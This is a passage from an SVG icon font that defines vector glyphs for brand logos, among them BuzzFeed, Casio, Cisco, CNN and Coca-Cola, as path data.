0-5 0-5-2 0-1 1-2 3-2 3 0 6 0 8-1 5-1 7-5 8-12 0-7 0-13 0-46v-39c0-21 0-39-1-48-1-6-2-10-7-11-2 0-4-1-7-1-3 0-4 0-4-2 0-1 2-2 4-2 9 0 23 1 28 1 6 0 20-1 34-1 3 0 4 1 4 2 1 2 0 2-3 2z m189 137c-10 0-17 0-19 0-4 0-15 0-25 0-3 0-5 0-5-1 0-2 1-2 4-2 2 0 7 0 10-2 4-1 6-5 6-16l2-83h-1c-2 3-28 29-41 42-28 27-57 57-60 59-3 4-6 7-8 7-2 0-3-3-3-7l-2-110c0-16-1-21-6-23-3-1-6-1-9-1-2 0-3-1-3-2 0-2 2-2 5-2 9 0 19 1 20 1 4 0 13-1 25-1 3 0 5 1 5 2 0 1-1 2-4 2-3 0-6 0-10 2-3 1-6 5-6 20l-2 76h0c4-4 24-26 45-46 21-20 45-43 57-54 2-2 4-4 8-4 1 0 3 2 3 6l2 117c0 11 2 14 7 16 2 0 4 0 6 0 2 0 3 1 3 2 0 2-2 2-4 2z m95-55l-8 4c-17 10-20 16-20 25 0 12 12 19 26 19 13 0 19-5 22-8 4-5 5-11 5-13 0-2 0-3 2-3 1 0 2 2 2 6 0 15 1 20 1 22 0 2-1 2-3 3-5 1-15 3-27 3-27 0-49-15-49-38 0-16 7-29 30-42l11-7c18-10 20-18 20-26 0-13-11-24-27-24-12 0-27 5-31 19-1 3-2 7-2 9 0 2 0 3-2 3-1 0-2-2-2-4 0-3-1-15-1-25 0-4 1-5 4-7 8-3 20-4 31-4 10 0 23 1 32 7 14 10 19 21 19 35 0 17-8 32-33 46z m128-82c-2 0-7 1-10 1-5 1-7 4-7 9-1 8-1 23-1 41v32c0 29 0 34 0 40 1 6 2 9 7 10 3 0 4 1 6 1s3 0 3 2c0 1-1 1-4 1-7 0-20 0-24 0-6 0-19 0-26 0-3 0-5 0-5-1 0-2 1-2 3-2 3 0 5-1 7-1 4-2 6-4 7-10 0-6 0-11 0-40v-32c0-18 0-33-1-41-1-5-2-8-6-9-1 0-3-1-6-1-3 0-3-1-3-2 0-1 1-2 3-2 8 0 21 1 25 1 6 0 19-1 32-1 2 0 3 1 3 2 0 1 0 2-3 2z m99 137c-12 0-26 0-32 0-5 0-17 0-28 0-2 0-4 0-4-1 0-2 1-2 3-2 3 0 6-1 8-1 6-2 8-4 8-10 1-6 1-11 1-40v-33c0-17 0-31-1-39-1-6-2-9-6-10-2-1-4-1-7-1-2 0-3-1-3-2 0-1 1-2 4-2 4 0 9 0 13 1 5 0 9 0 11 0 5 0 12-1 20-1 7-1 16-1 23-1 35 0 56 13 64 21 11 11 21 29 21 52 0 22-8 38-18 48-21 21-53 21-77 21z m51-120c-11-9-24-12-42-12-15 0-23 3-25 7-2 2-2 8-2 13 0 4-1 18-1 38v23c0 15 0 30 1 37 0 2 0 3 2 3 1 1 8 2 12 2 15 0 36-2 54-18 8-8 18-23 18-47 0-19-4-35-17-46z m174 9c-1 0-2-1-2-3-1-8-4-12-8-14-5-2-13-2-19-2-19 0-25 3-26 15 0 6 0 22 0 28v15c0 1 1 2 1 2 5 0 27-1 31-1 7-1 9-4 10-7 1-3 1-5 1-7 0-1 0-2 2-2 2 0 2 3 2 5 0 1 0 8 1 12 1 10 1 13 1 14 0 1 0 2-1 2-1 0-2-1-3-3-2-2-5-2-10-2-4-1-29-1-33-1-1 0-2 1-2 2v46c0 1 1 2 2 2 4 0 27 0 30-1 10-1 11-3 13-7 1-2 1-5 1-7 0-1 0-2 1-2 2 0 2 2 3 3 0 2 1 10 1 12 0 9 1 11 1 12 0 1 0 2-1 2-1 0-2 0-3-1-2 0-5-1-8-1-4 0-47 0-53 0-5 0-18 1-28 1-2 0-4-1-4-2 0-1 1-2 3-2 3 0 6 0 8-1 6-2 8-4 8-10 0-6 0-11 0-39v-33c0-17 0-32 0-40-1-5-2-9-6-10-2 0-4 0-7 0-2 0-3-2-3-2 0-2 1-2 4-2 4 0 8 0 13 0 5 0 9 0 11 0 6 0 13 0 22 0 10-1 21-1 36-1 7 0 9 0 10 5 1 4 3 16 3 20 0 2 0 5-2 5z m183-26c-2 0-3 0-5 1-3 0-10 1-21 12-11 12-25 29-42 50 19 15 27 27 27 41 0 12-8 22-14 25-10 7-24 8-36 8-6 0-24 0-30 0-4 0-17 0-27 0-2 0-4 0-4-2 0-1 1-2 3-2 3 0 6 0 8 0 6-2 8-4 8-10 0-6 0-12 0-40v-33c0-17 0-31 0-39-1-6-2-9-6-10-2-1-4-1-7-1-2 0-3-1-3-2 0-1 1-2 4-2 7 0 20 1 23 1 3 0 19-1 30-1 3 0 4 1 4 2 0 1-1 2-2 2-3 0-7 0-10 1-5 1-6 4-7 10-1 8-1 22-1 39v3c0 1 1 1 1 1l18 0c1 0 2 0 3-1 3-3 11-16 18-26 11-14 18-23 27-27 5-3 10-4 21-4h18c3 0 4 1 4 2 0 1-1 2-2 2z m-78 67c-3-2-6-3-14-3-4 0-10 0-14 2-2 0-2 1-2 3v55c0 2 0 3 2 3 2 0 6 1 11 1 12 0 30-7 30-33 0-16-7-24-13-28z" />
<glyph glyph-name="brand-buzzfeed" horiz-adv-x="1000" unicode="&#xe8b6;" d="M0 438c28 0 56 1 85 0 21 0 38-15 42-35 4-23-8-42-26-48 0 0-1 0-2-1 18-5 28-16 31-33 5-29-11-52-40-55-7-1-14-1-20-1l-70 0v173z m38-140c0 0 1-1 1-1 12 0 23 0 35 0 12 1 19 8 20 19 0 11-7 19-19 21-7 1-15 0-22 0-5 0-10 0-15 0v-39z m-1 72h32c2 0 4 0 6 0 7 2 12 5 14 13 3 12-4 22-17 23-6 0-12 0-17 0h-18c0-1 0-2 0-3v-33z m634-108c-4 0-9 1-13 2-34 8-51 38-48 70 2 27 16 47 42 56 36 13 78-5 85-53 0-6 0-13 1-20h-94c2-12 8-20 19-24 17-8 33-4 48 6 1 0 1 1 2 2 0 0 0 0 1 0 5-7 9-14 15-22-5-3-9-6-14-9-9-4-19-7-29-8-1 0-2 0-3 0-4 0-8 0-12 0z m34 78c1 16-14 28-33 27-15-1-29-14-28-27h61z m101-78c-5 1-11 1-16 3-26 7-43 28-45 55-3 24 5 45 24 61 31 24 90 18 101-38 1-4 2-8 2-12 0-4 0-9 0-14h-93c1-7 3-12 8-17 10-11 23-13 37-10 9 1 17 5 24 11 5-7 10-14 15-22-4-3-7-5-11-8-10-5-20-8-31-9-1 0-3 0-4 0h-11z m-27 78h61c1 15-14 27-32 27-16 0-30-13-29-27z m-590-78c-4 0-8 1-12 2-25 6-39 24-39 49v77h33v-4c0-23 0-46 0-69 0-10 3-19 13-24 11-5 21-4 31 3 8 5 10 13 10 21v73h32v-76c0-29-18-49-46-52-2 0-3 0-5-1-5 1-11 1-17 1z m313 3v173h120v-16c0-4 0-8 0-11 1-4-1-5-4-5-24 0-48 0-71 0h-8v-36h5c18 0 35 0 53 0 4 0 5-1 5-5 0-9 0-18 0-27h-63v-73c-13 0-25 0-37 0z m378 0v121c0 5 0 5 6 5 18 0 36 1 54-1 26-2 46-13 56-39 9-26 2-55-18-71-11-10-25-14-40-15-18-1-37 0-56 0 0 0-1 0-2 0z m32 27h18c22 0 35 12 37 33 2 15-6 31-19 36-12 5-24 2-36 3 0-24 0-48 0-72z m-588 70h-56v28h102c0-5-1-10 0-16 0-5-1-9-4-12-17-21-34-43-51-64-1-1-1-2-3-4h58v-29h-102c0 8 0 16 0 24 0 1 1 3 2 4 18 22 35 43 52 65 0 1 1 2 2 4z m55 0v25c0 1 1 2 1 3h101c0-7 0-15 0-22 0-1-1-3-2-4l-52-66c-1-1-2-2-3-4h5c16 0 33 0 49 0 3 0 4-1 4-4 0-8 0-16 0-25h-102c0 8-1 16 0 24 0 1 1 2 1 3l51 64c1 2 2 4 4 6h-57z" />
<glyph glyph-name="brand-cannon" horiz-adv-x="1000" unicode="&#xe8b7;" d="M246 399c-24 34-61 55-118 55-81 0-128-50-128-104 0-53 45-104 128-104 51 0 90 21 110 48l-4 12c-15-24-41-39-71-39-47 0-84 37-84 83 0 47 37 83 83 83 18 0 32-4 44-11l-43-72 83 49z m343 20c-5 0-9-2-13-3l-48-23c-3 14-15 26-31 26-4 0-8-2-12-3l-59-28h41v-137h61v122c0 8 7 15 15 15 9 0 15-7 15-15v-122h61v137c0 17-13 31-30 31z m-248-4l-72-27h79l14-48c-14 11-32 17-52 17-28 0-63-22-63-55 0-33 35-55 63-54 31-1 56 14 69 32l8-29h61l-37 130c-6 22-34 47-70 34z m-1-144c-17 0-31 14-31 31 0 17 14 31 31 31 17 0 31-14 31-31 0-17-14-31-31-31z m386 148c-48 0-86-39-86-87s38-86 86-86c48 0 86 39 86 86s-38 87-86 87z m20-160c-10-2-20 3-22 13l-31 111c-3 10 3 20 13 23 10 3 20-3 23-13l30-111c3-10-3-20-13-23z m223 160c-4 0-8-2-12-3l-49-23c-2 14-15 26-30 26-4 0-9-1-13-3l-58-28h41v-137h60v122c0 8 7 15 16 15 8 0 15-7 15-15v-122h61v137c0 17-14 31-31 31z" />
<glyph glyph-name="brand-casio" horiz-adv-x="1000" unicode="&#xe8b8;" d="M299 440l-77-181h62l12 33h90l12-33h63l-78 181h-84z m12-109l25 69h10l25-69h-60z m-148-1c-1-11-2-15-6-19-5-5-20-5-45-5s-43 0-48 5c-5 5-5 13-5 39s0 35 5 40c5 5 24 5 48 5s40 0 45-5c3-3 3-7 4-16h59c1 25-3 40-16 54-15 14-37 16-92 16-55 0-78-2-94-18-16-16-18-31-18-76 0-44 2-59 18-75 15-14 38-18 94-18 45 0 77 0 94 17 13 13 17 26 17 56h-60z m446 40l-69 3c-12 1-23-2-23 13 0 15 10 14 42 14 34 0 43 2 43-16h58c0 15-2 30-15 43-15 15-38 15-86 15-44 0-68 0-83-15-12-11-15-30-15-41 0-35 17-53 51-54l78-4c16-1 20-4 20-14 0-14-9-15-29-15h-33c-23 0-29 4-29 16h-58c0-11 0-30 11-40 14-14 23-19 92-19 69 0 76 4 91 19 12 12 13 27 13 38 0 42-18 55-59 57z m81 69h59v-179h-59z m291-13c-17 17-48 18-93 18s-75-1-93-18c-16-16-19-32-19-76 0-45 3-60 19-76 18-17 49-18 93-18s76 1 93 18c16 16 19 31 19 76s-3 60-19 76z m-46-115c-5-5-23-5-47-5s-42 0-47 5c-5 5-6 13-6 39 0 26 1 34 6 39 5 5 23 5 47 5s42 0 47-5c5-5 6-13 6-39 0-26-1-34-6-39z" />
<glyph glyph-name="brand-china-mobile" horiz-adv-x="1000" unicode="&#xe8b9;" d="M161 457c20-16 39-32 60-49 21 17 41 34 62 51 54 45 107 91 161 136 36 30 74 53 123 52 31 0 59-10 82-29 104-83 206-168 309-252 3-3 7-8 7-12 1-16 1-32 1-53-15 11-25 19-36 28-77 64-155 128-233 192-60 49-118 49-177-1l-196-164c-6-5-12-11-17-16 24-29 51-32 80-9 48 40 95 81 143 121 49 41 89 41 138 1 93-76 187-152 280-228 7-6 13-12 22-19-14-12-27-24-40-35-103-86-206-173-309-259-13-11-27-21-41-31-65-42-117-42-180 4-44 33-85 68-127 103-73 59-146 120-219 179-13 10-20 21-18 38 1 17 0 35 0 57 8-6 13-9 17-13 98-78 196-157 294-235 72-59 131-60 203 0 78 65 155 132 233 198 18 15 36 31 56 48-20 17-39 33-58 49-66-54-130-109-195-163-29-23-57-47-87-69-39-28-81-28-119 1-63 48-125 98-187 148-44 35-87 72-132 106-19 15-29 30-25 54 1 6 0 14 0 23 6-3 10-5 13-7 82-66 163-132 245-197 16-13 33-26 50-37 39-25 78-23 113 7 70 58 139 116 209 173 10 9 20 17 29 25-24 31-51 34-80 10-50-41-100-83-150-124-49-41-76-41-126-1-98 80-195 159-293 239-5 4-10 8-16 14 38 31 74 62 110 92 76 64 152 127 228 190 44 36 92 60 150 57 50-3 93-26 131-57 102-84 203-167 304-252 7-6 12-18 13-27 2-19 0-39 0-64-19 15-33 26-47 38-89 73-177 145-266 218-27 22-56 40-92 42-39 2-72-14-100-38-99-81-197-164-295-246-1-1-2-3-5-7z" />
<glyph glyph-name="brand-china-telecom" horiz-adv-x="1000" unicode="&#xe8ba;" d="M1000 659c-2-50-22-88-51-123-55-66-126-110-203-147-79-38-162-64-249-79-15-3-20-8-19-24 5-61 12-122 31-180 8-25 17-49 35-68 19-20 37-20 55 0 17 17 26 39 33 61 12 32 19 66 24 100 1 11 5 15 15 18 17 3 33 8 49 12 7 2 12 2 10-7-14-99-37-195-96-279-11-16-23-30-38-42-52-44-113-45-166 0-37 32-61 73-80 117-36 82-52 168-58 256-1 15-5 20-20 21-60 4-119 15-173 42-48 24-87 56-97 112-7 37 4 70 21 101 32 55 78 95 129 131 49 33 102 59 157 81 10 5 15 4 16-8 0-5 2-10 4-14 5-11 0-15-10-20-49-22-96-49-134-88-13-13-24-28-32-44-15-34-8-65 21-88 33-26 72-34 112-39 13-2 10 7 11 14 11 75 28 147 61 215 20 43 45 82 84 110 45 33 96 33 142 1 39-28 64-67 85-109 1-4 4-7 0-11-5-5-37-8-44-4-30 20-53 18-76-10-32-40-44-87-55-135-3-16-5-31-8-47-1-8-1-13 11-10 91 21 178 52 254 109 26 19 50 41 65 70 19 38 11 71-23 96-16 11-33 20-51 24-16 3-22 11-25 25-8 35-9 35 26 32 59-6 116-17 168-46 42-23 76-54 86-103 2-9 2-18 3-23z" />
<glyph glyph-name="brand-china-unicom" horiz-adv-x="1000" unicode="&#xe8bb;" d="M634 728c10-3 21-4 31-8 45-15 74-47 85-93 11-44 1-84-31-117-50-52-101-102-152-153-2-2-4-4-7-6 3-2 4-4 6-6l147-147c19-19 32-41 38-67 12-54-13-112-60-139-48-28-106-24-149 11-13 10-24 23-37 35-1 2-2 3-4 5-2-2-4-3-5-5-14-13-27-27-42-39-41-30-85-34-132-13-40 18-64 50-72 93-8 42 2 81 32 112 50 52 102 103 154 154 1 2 3 3 6 4-3 3-4 5-6 6-50 50-100 100-150 150-21 21-34 47-38 78-5 50 17 98 62 126 16 10 34 15 53 17 1 0 3 1 4 2h20c2-1 3-2 5-2 23-2 44-10 61-24 15-12 29-27 43-40 1-1 3-3 5-4 10 10 20 20 30 30 15 15 33 27 54 33 10 3 20 4 30 7h19z m-134-437c-1-1-2-2-3-3-39-39-77-77-115-116-14-13-27-27-40-40-7-8-11-19-10-30 1-19 10-34 29-41 18-7 34-2 49 11 6 6 12 12 18 18 4 4 8 8 14 13-17 17-33 33-48 48l60 60c15-16 31-32 47-48 16 16 32 32 47 47 20-20 40-40 60-60-15-15-31-31-47-47 12-12 24-25 37-36 17-13 42-11 57 3 19 19 19 47-1 67l-149 150c-2 1-3 2-5 4z m0 247c-16-16-32-32-47-47l-60 60c15 15 31 31 48 47-3 2-5 4-7 6-9 9-18 20-29 29-17 14-43 12-59-2-19-19-19-47 0-66 39-40 78-79 118-119 12-12 24-23 36-35 2 1 3 2 5 4l148 148c2 2 4 4 6 6 13 16 13 40 0 57-13 16-37 22-55 12-9-6-17-15-26-23-6-5-12-11-19-18 17-16 33-32 48-47l-59-59c-15 15-31 31-48 47z m500-199c-1-7-3-14-5-21-15-53-49-85-102-95-44-9-83 5-115 36-11 10-21 21-31 31l-48-47c-20 20-39 40-59 60 15 15 31 31 46 46-16 17-32 32-47 48l60 60c15-15 31-31 47-47 10 9 19 18 27 27 20 21 43 35 71 40 47 10 98-7 129-48 15-19 23-40 26-63 0-1 1-2 1-3l0-24z m-193 11c12-11 23-23 34-34 8-8 19-11 29-11 29 1 46 24 45 47-1 19-10 32-27 40-16 7-32 5-46-7-12-10-23-23-35-35z m-554 59c17 17 32 33 48 48l60-60c-15-15-31-31-47-47 16-16 31-31 46-47-20-20-39-39-59-59-15 15-31 31-47 47-11-10-21-20-30-30-19-20-42-33-70-38-47-8-88 5-121 42-27 29-37 64-32 103 6 40 26 71 61 93 51 31 115 24 157-17 12-11 22-23 34-35z m-59-60c-12 12-22 24-34 34-10 10-23 14-38 11-19-3-31-14-36-33-4-18 1-33 15-45 15-12 33-16 49-5 16 10 29 25 44 38z" />
<glyph glyph-name="brand-cisco" horiz-adv-x="1000" unicode="&#xe8bc;" d="M282 461c0 17-7 25-21 26-14 0-22-8-22-25 0-75 0-150 0-224 0-17 7-24 21-24 15 0 22 8 22 25 0 37 0 74 0 111 0 37 0 74 0 111z m458 26c-14-1-22-9-22-26 0-31 0-63 0-94 0-43 0-85 1-128 0-19 10-28 26-25 13 3 16 13 16 25v112c0 36 0 73 0 110 0 17-7 26-21 26z m-578-107c0 16-7 24-21 24-13 1-21-7-21-23-1-34-1-67 0-101 0-15 8-23 20-23 14 0 22 8 22 24 0 16 0 33 0 50 0 16 0 32 0 49z m698 24c-13 1-22-8-22-23 0-17 0-34 0-50s0-34 0-51c0-14 8-23 21-23 13 0 21 8 21 23 1 34 1 68 0 101 0 15-7 23-20 23z m-481 0c-13-1-20-8-20-22 0-17 0-34 0-51v-52c0-13 6-21 20-22 13-1 22 8 22 21 1 35 1 70 0 105 0 14-9 22-22 21z m240 0c-13 0-20-8-20-23 0-16 0-33 0-49 0-17 0-34 0-50 0-16 7-25 21-25 13 0 21 8 21 24 0 33 0 66 0 100 0 15-8 24-22 23z m-98-81c-1 13-10 22-21 22-11 0-21-9-21-22 0-15 0-30 0-45 1-13 9-22 22-21 12 1 19 8 20 20 0 8 0 16 0 23 0 8 0 16 0 23z m-501 22c-12-1-20-8-20-21 0-8 0-15 0-23 0-8 0-15 0-23 0-13 7-20 20-21 12-1 22 7 22 20 1 16 1 32 0 49-1 12-10 19-22 19z m980-44c0 8 0 15 0 23 0 12-7 19-19 21-12 1-21-6-22-18-2-18-2-36 0-53 1-12 10-18 22-17 12 1 18 8 19 20 0 8 0 16 0 24z" />
<glyph glyph-name="brand-citibank" horiz-adv-x="1000" unicode="&#xe8bd;" d="M206 362c34 0 68-16 97-46l2-1 46 55-1 2c-39 45-85 67-141 67-57 0-109-19-147-53-40-38-62-90-62-153 0-62 22-115 62-152 38-35 89-54 147-54 56 0 102 22 141 68l1 1-46 56-2-2c-29-29-62-45-97-45-72 0-124 54-124 129s52 128 124 128z m191 71h82v-398h-82z m341-331c-26 0-38 14-38 45v211h83v75h-83v124l-80-43v-81h-69v-75h69v-225c0-61 36-103 91-104 36-1 59 10 72 18l1 1 20 77-5-3c-22-13-42-20-61-20z m128 331h82v-398h-82z m-428 67c64 66 148 101 234 101s169-35 233-101l1-1h94l-3 5c-75 106-199 169-325 169s-251-63-325-169l-4-5h94l1 1z" />
<glyph glyph-name="brand-cnet" horiz-adv-x="1000" unicode="&#xe8be;" d="M500 850c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m-379-600v164c-2 93 161 93 158-2v-29h-47l-1 31c0 36-62 35-63-2l1 2v-166c0-36 62-35 62 0v37h48v-35c3-95-160-92-158 0z m225-199h-35v568h35v-568z m236 136h-79v232c0 34-57 32-57-2v-230h-71v36h23v217l-27 0v35h68l0-26s9 13 30 25c26 14 51 2 51 1h0c22-9 30-33 31-58v-194h31v-36z m15 63v164c-1 93 161 93 158-2v-79c0-5-4-8-8-8h-102v-77c0-36 62-35 62 0v37h48v-35c3-94-160-92-158 0z m255-63c-13 0-24 5-26 6 0 0 0 0 0 0 0 0 0 0 0 0 0 0-1 0-1 0-21 10-29 33-30 59v298h48v-74l0-1h46v-35h-46l0 0 0-192c1-19 12-25 25-25 10 0 30 0 30 0v-35c0 0-38 0-46-1z m-145 227c0 36-61 36-62 0l0-53h62l0 53z" />
<glyph glyph-name="brand-cnn" horiz-adv-x="1000" unicode="&#xe8bf;" d="M0 345v19c0 1 0 2 0 3 2 29 8 58 20 84 29 64 77 105 144 124 27 9 55 11 83 11 23 1 45 0 68 0h3v-59h-82c-15 0-30-1-45-4-41-9-75-30-99-64-33-48-41-101-26-158 11-42 36-75 74-98 29-17 62-25 96-25 47 0 95 0 142 0 5 0 9 1 13 3 12 6 19 16 19 30v281c0 2 0 4 0 6 0 6 3 11 8 12 5 1 10-1 13-5 1-1 1-2 2-2 64-104 128-207 193-311 1-2 2-4 4-5 7-8 15-12 25-10 9 3 15 9 18 18 1 5 2 9 2 14 0 54 0 108 0 162v123c0 3 0 6 1 8 3 8 11 10 17 6 2-2 4-4 6-6l102-165c30-48 60-96 90-144 2-4 5-7 8-9 14-12 33-7 40 10 2 5 2 10 2 16v373c0 1 0 2 0 3h59v-3c0-128 0-255 0-383 0-9-1-17-2-25-5-23-18-42-39-53-22-12-45-12-69-4-24 8-42 24-55 46-33 54-65 108-98 163l-2 2 0 0v-128c0-10-1-20-4-30-7-27-24-47-52-55-26-8-50-3-73 11-16 10-28 24-38 40-32 53-65 107-97 160l-1 2c-1-1-1-2-1-3v-117c0-11-1-22-4-32-7-24-21-41-44-51-14-6-28-8-43-8h-129c-27 0-53 3-79 10-34 10-64 25-90 48-48 41-73 95-79 157 0 4-1 8-1 12z m689 243c3-1 7-1 11-2 20-4 36-15 51-29 8-9 15-19 21-30l93-159c0-1 1-1 2-2v220h59v-378c0-3 0-6-1-9-3-7-11-9-16-4-2 1-3 3-5 5-57 92-114 184-171 276-7 11-14 23-22 34-4 7-9 12-17 14-14 4-28-4-32-19-1-4-2-8-2-12l0-283c0-3 0-6-1-9 0-4-2-8-7-9-4-1-7 1-10 4-1 1-2 2-3 4-64 103-128 206-193 310-5 9-12 14-23 15-12 1-22-6-26-18-2-5-2-9-2-14 0-94 0-187 0-281 0-2 0-4-1-5-1-9-8-14-17-14h-135c-2 0-4 0-6 0-24 0-47 4-69 13-46 20-75 55-87 103-12 46-6 90 18 131 22 37 55 59 97 68 13 3 26 4 40 4h83v-59h-3c-28 0-55 1-83 0-37-1-67-17-85-50-21-36-20-73 3-108 11-18 28-29 47-36 16-6 33-8 50-8h72c10 0 16 7 16 17v197c0 12 0 24 0 36 1 25 9 47 27 65 14 12 30 20 48 21 1 1 2 1 2 1h11l2-1c17-1 33-8 46-18 15-11 26-26 36-42 30-53 61-106 92-159 0-1 1-1 1-2l1 0v3c0 43 0 87 0 130 0 8 1 16 2 23 9 34 30 56 64 64 4 1 7 1 11 2 3 0 7 0 11 0z" />
<glyph glyph-name="brand-cocal-cola" horiz-adv-x="1000" unicode="&#xe8c0;" d="M353 248c-14 3-30 4-47 4-14 1-29 0-56-6-27-6-65-18-91-24-26-6-38-8-51-8-6 0-12 0-18 1s-10 3-14 5c-4 1-7 3-11 6-3 2-5 4-7 7-3 2-4 5-6 8s-3 6-4 10c0 3-1 7-1 11-1 4-1 8 0 13 0 6 2 13 5 22 2 9 7 20 13 34 6 13 15 29 25 45 10 16 21 32 32 45 10 13 20 24 29 32 8 9 16 15 22 20 7 4 12 8 17 10 4 2 9 4 12 5 4 1 7 1 11 1 2 0 3 0 5-1 2-2 2-4 2-6 0-1 0-3 0-4-5-3-11-6-15-10-2-2-3-3-4-4-3-4-5-7-5-10-1-3 2-7 4-8 6-5 13-2 20 6 2 2 3 4 5 6 1 2 2 5 3 7 4 9 6 19 0 28-1 1-2 3-4 4-2 2-5 3-7 4-3 0-6 1-10 1-5 0-11-1-18-3-7-1-14-4-23-7-8-4-18-9-28-16s-22-16-34-27c-12-11-24-23-36-36-23-27-41-56-51-79-5-12-9-22-12-31-2-9-4-17-4-25-1-10-1-20 1-29 1-4 2-8 3-11s3-7 5-10c2-3 4-6 7-9 2-2 5-5 9-7 3-2 7-4 12-6 5-2 10-3 17-4 7-2 16-2 24-2 13-1 26 0 48 5 23 5 54 14 76 19 22 4 36 5 49 5 8 0 16-1 23-2 7-1 12-2 16-4 5-2 9-5 14-9 5-4 10-9 14-14 15 10 30 15 41 17 6 1 11 2 16 2 2 0 4 0 6-1 3 0 6-1 14-3 8-3 21-8 34-13-13 13-27 23-40 31-12 7-24 12-37 15z m167 176h-31l-15-28h29l17 28z m441 49c-13-7-24-12-37-16-13-3-27-5-41-4l-27-32c3 0 5-1 6-1 4 0 8 0 13 0 9 0 19 1 29 4 20 5 42 16 60 31 9 8 16 16 22 23 6 8 11 16 14 24-13-11-27-22-39-29z m-35-199c-5-8-11-15-15-20-5-6-8-9-11-12-3-3-5-5-7-6-1-1-3-2-4-3-2-1-4-2-6-1-2 0-2 2-2 4 0 0 0-1 3 5 2 5 6 13 11 21l52 89h-26l-8-8c-4 3-7 5-9 6-3 1-4 1-6 2-1 0-3 0-5 0-9 0-17-3-26-8-3-2-6-4-9-7-4-2-8-6-12-10-5-4-10-9-19-21-10-12-23-30-33-42-9-13-14-20-18-24-4-4-6-6-8-7-1-1-3-2-4-2-1-1-2-1-4-1-2 0-5 4-5 6-1 5-1 7 1 14 1 4 3 10 5 18 3 8 6 17 10 27 19 13 39 27 53 39 15 12 26 23 36 35 11 13 22 27 32 43l-12-2c-8-10-16-21-26-32-10-11-21-22-33-33-12-11-26-21-39-31 8 17 18 33 27 49 10 16 20 31 31 45 10 15 20 28 29 38 9 11 17 20 23 26 7 6 12 10 16 13 4 3 7 4 9 5 2 1 3 2 5 2 1 0 1-1 2-1 3-3 2-4 2-7 0 0 0-1-2-4-1-3-3-9-5-14l10 1c2 4 4 7 5 9 1 2 2 3 2 5 0 1 1 3 1 4 0 5-1 10-6 15-1 1-2 2-4 2-6 2-10 1-17-1-4-1-9-3-15-6s-13-8-22-15c-8-7-18-15-29-27-11-12-24-26-37-43-13-17-26-37-38-57-12-19-23-40-34-61h-14c3 6 6 12 7 16 2 5 3 7 3 10 2 7 2 15 0 21-1 2-2 4-3 5-5 6-9 7-15 7-2 0-5-1-8-1-3-1-6-2-10-4-5-2-9-5-14-8-5-4-11-9-17-15-6-5-13-12-19-20-12-15-22-32-28-44-3-7-5-13-6-18-1-5-2-9-2-13-1-3-1-7 0-10 0-2 1-5 2-7s3-5 5-6c1-2 3-3 6-4 2-1 5-1 7-1 6 0 11 1 18 4 3 2 7 5 11 8 5 3 10 7 15 13 6 6 12 13 20 23 7 10 15 22 23 34h14c-5-12-9-24-12-32-2-8-3-11-3-14-1-6-2-12-2-17 1-2 1-4 2-6 0-2 1-4 2-6 1-1 3-2 4-4 2-1 4-2 6-2 2-1 4-1 6-1 8 0 15 2 24 9 4 2 8 5 13 10 4 4 10 10 15 16 0-4 0-7 0-11 0-3 0-5 0-7 1-2 1-4 2-5 0-2 1-3 1-4 1-2 3-3 4-5 3-1 5-2 9-2 2 0 4 0 6 1 4 0 7 2 12 5 3 1 5 3 9 6 4 4 9 8 13 13 0-3 0-7 0-9 0-3 0-5 1-6 0-2 0-3 1-4 1-3 4-6 6-6 8-3 14-1 23 3 3 2 7 4 11 8 4 3 9 7 14 13 5 5 11 12 17 21 7 9 13 19 19 30l-7-1z m-230-9c-4-5-8-10-12-15-4-4-7-8-10-11-3-3-6-5-8-7-2-1-4-2-5-2-2-1-2-1-3-1-3 0-6 1-9 5 0 1-1 2-2 3-1 3-1 6-1 10 1 3 1 6 2 9 1 3 2 7 4 10 5 12 14 25 27 36 2-2 3-5 6-8 1-1 2-2 4-4 2-1 4-2 7-4 3-1 7-3 11-4-4-6-7-11-11-17z m24 54c0-2 0-3-1-5 0-2 0-4-2-8-2-3-4-9-7-15-4 1-7 3-9 4-2 1-3 2-5 3-1 1-2 2-2 2-2 2-3 4-3 6-3 9-2 19 10 27 3 2 6 3 9 3 3 0 5-1 8-3 2-2 2-5 3-8 0-2-1-4-1-6z m138-61c-3-5-7-11-10-15-4-4-6-6-8-8-2-2-4-3-6-4-3-1-7-1-9 1-2 2-2 4-2 8 0 1 0 3 1 6 1 2 1 5 2 8 2 3 3 7 5 11 2 4 5 8 8 13s7 11 11 17c5 6 10 12 15 17 5 5 9 10 13 13 4 3 7 6 10 7 2 2 4 3 5 3s3 1 4 1c1 0 3 0 4-1 2-2 1-4 0-6 0-2-1-4-2-6-1-2-3-5-4-8l-37-57z m-231 50c1 7 2 13 3 19 0 4 0 9-1 12-1 2-1 3-2 4-2 3-4 4-7 6-1 0-3 1-5 1-2 1-4 1-7 1-2 0-5-1-8-1-12-2-24-9-37-23-4-4-7-8-10-13-4-5-7-10-10-16-3-6-5-13-8-20-2-7-4-14-6-21 7 6 14 11 19 15 5 3 8 5 12 7 4 2 9 5 14 7 2 8 4 16 8 23 1 3 3 6 4 9 2 2 3 4 5 6 4 5 8 7 11 9 6 2 11 3 15-2 2-2 3-4 3-7 0-9-2-18-6-28-2-4-4-9-6-14-3-5-6-10-10-15-7-10-17-21-29-30-10-9-22-15-29-18-4-1-7-1-10-1-2 0-5 0-7 1-5 1-10 5-14 9-2 3-3 5-5 8-2 6-3 12-2 17 1 7 2 13 6 24 5 11 11 27 20 45 10 17 21 37 32 54 11 17 22 31 31 43 10 12 18 21 26 28 8 8 14 14 20 18 7 5 12 8 17 11 5 3 9 5 13 6 11 5 21 5 31 5-8-5-16-11-24-17-14-11-25-23-32-33-4-6-6-10-9-15-2-4-3-9-4-13-2-4-2-7-3-10 0-3 0-5 0-7 1-2 1-4 2-5 0-2 1-3 2-4 1-1 2-2 4-3 1-1 2-1 4-2 2 0 4 0 6 0 5 0 9 1 15 3 3 2 6 3 9 6 4 2 7 5 11 9 4 4 8 8 12 13s7 11 10 16c6 10 10 20 12 29 1 5 2 8 2 12 0 1 0 2 0 4s0 5 0 7c0 2 0 3 0 5 10 0 20-1 29-4 8-2 17-6 29-13 11-8 27-19 42-32l28 30c-9 8-19 15-28 21-8 5-15 9-22 12-6 3-12 4-18 6-8 1-14 2-23 1-4-1-7-1-13-3-6-2-16-5-25-8-5 3-10 6-14 8-4 2-6 2-9 3-9 1-18 0-29-3-9-3-19-7-31-13-11-6-25-15-39-25-14-10-28-23-41-36-14-13-26-27-36-40-10-13-18-26-25-38-7-12-13-23-17-34-4-11-7-20-10-29-2-10-3-18-4-25-1-7 0-12 0-17 